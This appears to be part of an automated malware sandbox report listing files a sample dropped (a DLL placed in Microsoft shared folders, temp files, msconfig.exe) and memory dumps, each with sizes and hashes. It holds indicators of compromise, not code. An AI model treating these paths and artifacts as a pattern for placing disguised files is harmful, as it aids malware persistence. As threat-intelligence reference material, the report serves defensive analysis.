SHA256
91e2b43778246427b2408226cd8414e7e38bf61efb1247e2f7f6c45ce338bd88

SHA512
ff2316f346626163bda5563bb569650a5a9b4b1b5c175425509272dfdb7541622e0920055beacd1612ff025b6b6ba075ec28da06d155a2fd75f08a255e5b99bb

Download Submit
C:\Program Files\Common Files\microsoft shared\Source Engine\msvcp120ex.dll

Filesize
8.0MB

MD5
ce4d177433ceab4a2fa45595cd23025f

SHA1
1f6b5bb223afbc577e9dfaa58ac8fed70eefe284

SHA256
16953bb5139ff42efb69e558acaa95715cac94b2761c89abaa88dde77dcd63d5

SHA512
91480157bf40013a753fc3df0354934e6c1c9fbb6a04a0ae126e0e751c613857ddf6662dc0042b970a517c1aa57544a47203ba95050be2ff557b525c89c5f13e

Download Submit
C:\Program Files\Common Files\microsoft shared\ink\msvcp120ex.dll

Filesize
8.0MB

MD5
e7020e70d7076429f6e86f1666661b6d

SHA1
39a349b9d8161c2c1be9cc7c6b29d709135465c8

SHA256
fc5d82a054c8df8bb1243cead7bf762f034e8c0d63a94876f4584710cc2b9748

SHA512
b2ab9084d2f8e549e3e1c124fbc0aedfd35c6fad2672dd87100e660e6047aaeb2ec9d77542b786ca86988d1aceac0b3e5d735c2a9b4a2fed71f513a232704494

Download Submit
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\945734880

Filesize
2.7MB

MD5
a3ab3ca9291b7ba693006e769e849225

SHA1
cf63932fa6dcc6735af25dc921e5ebec3c04b371

SHA256
38198b75153e8c0925b3fe946d2628072bf20bfea5772432005f4d033a9a56da

SHA512
ce57a0b39c7d32c361c290e8d666652874c4c25c35eb183f8520b8acc3c973fa44d7a5ea8f0055b244af7ff5490524ba7414fee1da877faa4dd490b016126d51

Download Submit
C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-1000-0000000FF1CE}\241397553

Filesize
1.0MB

MD5
3d724a41534c152d56d5ec8711786043

SHA1
358793e7be3b348fc9546258b2fa22cdf1bdd260

SHA256
a72027d8620859bca16fdb095de23090921ed5076f3d4781ae6dfedf141e2997

SHA512
7c5320b1d46922d2e5df62521469d0d0ab571c278ee4becb7a06e5a374835fbdec48129abe787867a28392d3fe2a8028c669eebfbd75353f4cc3c0936c01c38a

Download Submit
C:\Users\Admin\AppData\Local\Temp\53815939

Filesize
307KB

MD5
f1a9b4b1f750bb90b7240f38aa3fd939

SHA1
4d630bd6b89f4ba0315ed37035d5e32775a7b969

SHA256
7cc9be747a138d8b9e716ee5f16188215b730af91d9fe954d8e172f515f5b498

SHA512
e4d6eea0e415d27f39224af29cef84bd55fb098b06c7aaee38d6eac34621ca3585bbae0d2fc2938bbe5755fd6d3bbbf47f9c4bc29a6e6914f761c1c76e4a107f

Download Submit
C:\Users\Admin\AppData\Local\Temp\575293965

Filesize
2KB

MD5
b0af6cf00c41fe07b91f0b69064cf6df

SHA1
04226581053a378c45bb68d302b1ece612caefb5

SHA256
edb83b12f965662b1625191dc226803e38fde822898cab4bfe5b2c2b96371525

SHA512
b13bbef0a381fa2cf91cb06990d089dbb3d386b176de97294feb8de0e95a3b630ada8fa5d871acbc92c63cc20b27b42c1bb99cb47462031cf1a20b175aa7f5a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\93882982

Filesize
1KB

MD5
888f9fabb88a863c8efc9ef6c336995a

SHA1
5e94317fb2477e50616394941d3575ea6579725d

SHA256
8e46e23005c0fb1456b3e5d9fe4d0b310437bf4a849dad1582eebd6974a76a7c

SHA512
67a5b05daf443325bd8e5e8dab0b7144f66583eabcde97caf498b242601aaababd774f447487e1cb4c206ef0e7b226b373edcc084ce5c72cc99fac51b18611cf

Download Submit
C:\Windows\System32\msconfig.exe

Filesize
35KB

MD5
62f170fb07fdbb79ceb7147101406eb8

SHA1
d9bbb4e4900ff03b0486fac32768170249dad82d

SHA256
53e000f5aa9b3a00934319db8080bb99cb323bf48fc628a64f75d7847c265606

SHA512
81bd918ec7617acea3d8b5659ac518e5bc19e585f49bdd601fff6fadea95f2fd57450ee41d181280089b92c949289249a350aa5428e2e31b53fdff2f47c46265

Download Submit
memory/3604-46-0x00007FFF813E0000-0x00007FFF81EA1000-memory.dmp

Filesize
10.8MB

Download
memory/3604-114-0x0000000025CB0000-0x0000000025D10000-memory.dmp

Filesize
384KB

Download
memory/3604-0-0x00007FFF813E3000-0x00007FFF813E5000-memory.dmp

Filesize
8KB

Download
memory/3604-43-0x00007FFF813E3000-0x00007FFF813E5000-memory.dmp

Filesize
8KB

Download
memory/3604-2-0x00007FFF813E0000-0x00007FFF81EA1000-memory.dmp

Filesize
10.8MB

Download
memory/3604-1-0x0000000000300000-0x0000000000B12000-memory.dmp

Filesize
8.1MB

Download